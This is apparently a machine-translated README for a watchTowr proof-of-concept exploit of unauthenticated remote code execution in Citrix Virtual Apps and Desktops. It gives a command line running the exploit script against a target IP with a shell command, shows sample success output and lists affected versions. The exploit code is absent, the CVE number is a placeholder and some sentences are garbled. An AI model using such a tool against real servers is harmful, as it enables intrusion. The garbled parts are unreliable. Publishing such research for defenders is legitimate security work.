
Citrix वर्चुअल ऐप्स और डेस्कटॉप (XEN) बिना प्रमाणीकरण के RCE
Citrix वर्चुअल ऐप्स और डेस्कटॉप (XEN) अनप्रमाणित रिमोट कोड निष्पादन भेद्यता
विस्तृत तकनीकी जानकारी के लिए हमारा ब्लॉग पोस्ट देखें।
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
CVE-xxxx-xxxxx.py
(*) Citrix 虚拟应用和桌面 未认证远程代码执行 (CVE-xxxx-xxxxx) 漏洞利用 by watchTowr
CVE: [CVE-xxxx-xxxxx]
[INFO] कमांड सफलतापूर्वक 192.168.1.120 को भेजा गया!
Citrix Virtual Apps and Desktops 7 2402 LTSR और इससे पहले के सभी संस्करण इस भेद्यता से प्रभावित हैं, अधिक जानकारी के लिए Citrix आधिकारिक बुलेटिन देखें।
यह शोषण उपकरण द्वारा लिखा गया है, से।
नवीनतम सुरक्षा अनुसंधान अपडेट प्राप्त करने के लिए, watchTowr प्रयोगशाला टीम का अनुसरण करें: